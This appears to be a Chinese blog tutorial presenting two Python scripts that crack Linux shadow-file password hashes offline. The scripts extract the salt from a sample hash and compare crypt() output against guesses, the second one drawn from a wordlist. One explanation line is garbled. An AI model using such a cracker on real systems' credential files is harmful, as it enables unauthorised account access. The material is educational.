Python 之 shadow 爆破密码脚本编写

news2024/9/27 21:18:29

文章目录

  • Linux shadow 爆破脚本
    • Linux shadow 爆破初探
    • Linux shadow 爆破进阶

Linux shadow 爆破脚本

Linux shadow 爆破初探

目的是为了明白其shadow爆破原理

# Linux shadow爆破初探 1

import crypt

#shadow文件中的一条用户数据
shadow_line = "ghui:$y$j9T$DQ2d2fD138oudY0Xa2wst/$dp/6WvvsTE2l50Iw1l.NvNPTIiJY6lmyB7sygyEj/S3:19618:0:99999:7:::"

print(f"[+] The shadow line is: {shadow_line}")

#  从shadow文件中提取密码密文。
crypt_text = shadow_line.split(":")[1]
print(f"[+] The crypt text is: {crypt_text}")

# 从密码密文中,提取盐值
salt = crypt_text[0:crypt_text.rindex("$")] # rindex("$") 表示最后一次出现 $ 符的位置
print(f"[+] The salt is: {salt}")

# 从密码字典中,读取密码,假设此时读到的密码为 123456
password = "123456"

# 把读取的密码与盐值进行加密运算,得到猜测的密码密文
new_crypt_text = crypt.crypt(password,salt)

# 如果猜测的密码密文与shadow文件中的密码密文一致,说明密码猜对了。
if new_crypt_text == crypt_text:
    print(f"[+] PASSWORD FOUND: {password}")
else:
    print(f"[-] PASSWORD NOT FOUND!")

说明:

split(“:”)[1] 通过冒号:分隔符对字符串进行切片,并且取第二部分

​ **crypt_text.rindex(" " ) ∗ ∗ 函数返回子字符串 ‘ ")** 函数返回子字符串 ` ")函数返回子字符串在字符串变量crypt_text`中最后出现的位置

image-20230918174600308

Linux shadow 爆破进阶

# Linux shadow 爆破 2

from termcolor import colored
import crypt

shadow_line = "ghui:$y$j9T$DQ2d2fD138oudY0Xa2wst/$dp/6WvvsTE2l50Iw1l.NvNPTIiJY6lmyB7sygyEj/S3:19618:0:99999:7:::"

print(f"[+] The shadow line is: {shadow_line}")

#  从shadow文件中提取密码密文。
crypt_text = shadow_line.split(":")[1]
print(f"[+] The crypt text is: {crypt_text}")

# 从密码密文中,提取盐值
salt = crypt_text[0:crypt_text.rindex("$")] # rindex("$") 表示最后一次出现 $ 符的位置
print(f"[+] The salt is: {salt}")

# 从密码字典中,读取密码。
file_path="/home/kali/tools/wordlists/top_password.txt"

with open(file=file_path,mode="r") as f:
    
    for line in f:
        password = line.strip()
        print(f"\r[-] Trying password: {password}",end="")
        
# 把读取的密码与盐值进行加密运算,得到猜测的密码密文
        new_crypt_text = crypt.crypt(password,salt)

# 如果猜测的密码密文与shadow文件中的密码密文一致,说明密码猜对了。
        if new_crypt_text == crypt_text:
            print(colored(f"\n[+] PASSWORD FOUND: {password}","green"))
            exit()
            
    print(f"[-] PASSWORD NOT FOUND!")

说明:

strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)

image-20230918174709373

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1026258.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

(JavaEE)(多线程案例)线程池 (简单介绍了工厂模式)(含经典面试题ThreadPoolExector构造方法)

线程诞生的意义,是因为进程的创建/销毁,太重了(比较慢),虽然和进程比,线程更快了,但是如果进一步提高线程创建销毁的频率,线程的开销就不能忽视了。 这时候我们就要找一些其他的办法…

基于微信小程序的个人健康管理系统的设计与实现(源码+lw+部署文档+讲解等)

前言 💗博主介绍:✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战✌💗 👇🏻…

ad18学习笔记十二:如何把同属性的元器件全部高亮?

1、先选择需要修改的器件的其中一个。 2、右键find similar objects,然后在弹出的对话框中,将要修改的属性后的any改为same 3、像这样勾选的话,能把同属性的元器件选中,其他器件颜色不变 注意了,如果这个时候&#xff…

CSS 布局 (三) 浮动、定位、多列布局

6、浮动 最初用于在文本块内浮动图像,float属性成为在网页上创建多列布局最常用的工具之一。随着flexbox和grid的出现,它现在又回到了最初的目的,正如本文所解释的那样。 6.1 浮动的背景 引入float属性是为了允许web开发人员实现包含图像在…

Qt Charts简介

文章目录 一.图标类型Charts分类1.折线图和样条曲线图2.面积图和散点图3.条形图4.饼图5.误差棒图6.烛台图7.极坐标图 二.坐标轴Axes类型分类三.图例四.图表的互动五.图表样式主题 一.图标类型Charts分类 图表是通过使用系列类的实例并将其添加到QChart或ChartView实例来创建的…

【Linux】指针常量和常量指针

这个是指针常量,不能修改指向【其实就是引用的原型】:可以理解为const是否限制了星号 这个是常量指针,可以改指向,不能改值:

[Qt/C/C++]JSON和程序发布

文章摘于 爱编程的大丙 文章目录 1. JSON1.1 Json数组1.2 Json对象1.3 注意事项 2. Qt中JSON操作2.1 QJsonValue2.2 QJsonObject2.3 QJsonArray2.4 QJsonDocument2.5 举例2.5.1 写文件2.5.2 读文件 3. cjson库的使用3.1 cJSON结构体3.2 cJson API3.2.1 数据的封装3.2.2 Json对…

搭建自动化 Web 页面性能检测系统 —— 设计篇

页面性能对于用户体验、用户留存有着重要影响,当页面加载时间过长时,往往会伴随着一部分用户的流失,也会带来一些用户差评。性能的优劣往往是同类产品中胜出的影响因素,也是一个网站口碑的重要评判标准。 一、名称解释 前端监控…

滚雪球学Java(26):Java进制转换

🏆本文收录于「滚雪球学Java」专栏,专业攻坚指数级提升,助你一臂之力,带你早日登顶🚀,欢迎大家关注&&收藏!持续更新中,up!up!up!&#xf…

【数据结构】二叉树的节点数,叶子数,第K层节点数,高度,查找x节点,判断是否为完全二叉树等方法

💐 🌸 🌷 🍀 🌹 🌻 🌺 🍁 🍃 🍂 🌿 🍄🍝 🍛 🍤 📃个人主页 :阿然成长日记 …

【C++】STL之vector操作

文章目录 简介vector中的成员类型模板参数头文件的包含构造函数vector的访问方式:下标[ ]迭代器范围for 交换swap 简介 vector是stl中的一种数组容器,vector在英文中有矢量的意思,但实际上在数据结构中就是一种类似于数组的结构;…

滚雪球学Java(25):动态代理

🏆本文收录于「滚雪球学Java」专栏,专业攻坚指数级提升,助你一臂之力,带你早日登顶🚀,欢迎大家关注&&收藏!持续更新中,up!up!up!&#xf…

数据挖掘note(1)

数据挖掘一般分为机器学习和统计学习,大数据学的课程一般是关于机器学习,我们学的浅,主要关于统计学习,示意图如下所示: 这是一个大数据时代,但是数据挖掘的利用率不足0.5%,可见数据挖掘的空间巨…

全国各地演讲口才培训机构信息那么多需要如何选择?

演讲口才是一项非常重要的能力,它不仅可以帮助我们在职场中更好地表达自己,还可以在公共场合中更好地展示自己的个性和魅力。因此,越来越多的人开始关注演讲口才的培训,而全国各地也涌现出了众多的演讲口才培训机构。 选择适合自己…

ReactNative中升级IOS 17版本Crash解决

ReactNative中升级IOS 17版本Crash解决 ReactNative中升级IOS 17版本Crash解决一、问题描述二、原因分析三、解决方案决策3.1 设置宽高为非零值3.2 使用新的UIGraphicsImageRenderer替换就版本的UIGraphicsBeginImageContext 四、可能使用到该API的三方库4.1 react-native-fast…

RK3568开发板SG90 舵机模块的功能实现-迅为电子

1 模块说明 SG90 舵机模块如下图所示: 常见的舵机转向角度有 0-90 度,0-180 度,0-360 度,可以用在垃圾桶项目开盖用,智能小车的全比例转向,摄像头云台,机械臂等。 2 接线说明 SG90 舵机模块上三条线&…

猫头虎博主成为创作者的第1024天纪念日

🌷🍁 博主猫头虎 带您 Go to New World.✨🍁 🦄 博客首页——猫头虎的博客🎐 🐳《面试题大全专栏》 文章图文并茂🦕生动形象🦖简单易学!欢迎大家来踩踩~🌺 &a…

Unity制作曲线进度条

unity制作曲线进度条 大家好,我是阿赵。   在使用Unity引擎做进度条的时候,有时会遇到一个问题,如果进度条不是简单的横向、纵向或者圆形,而是任意的不规则形状,那该怎么办呢?比如这样的: 一…

【JDK 8 -收集和统计】7.1 collector 收集器

一、collect()方法 二、两个重载方法 2.1 方法一 2.2 方法二(常用) 三、Collector 的 作用 四、Collectors 的作用 > Collectors.toList() > Collectors.toMap() > Collectors.toSet() > Collectors.toColl…

基于深度强化学习的四旋翼无人机航线跟随

源自:指挥与控制学报 作者:杨志鹏 李波 甘志刚 梁诗阳 “人工智能技术与咨询” 发布 摘 要 针对无人机在空中执行航线跟随任务时无法对未知环境作出合理应对措施等问题, 提出了一种基于深度强化学习的四 旋翼无人机航线跟随方法. 通过无人机受力…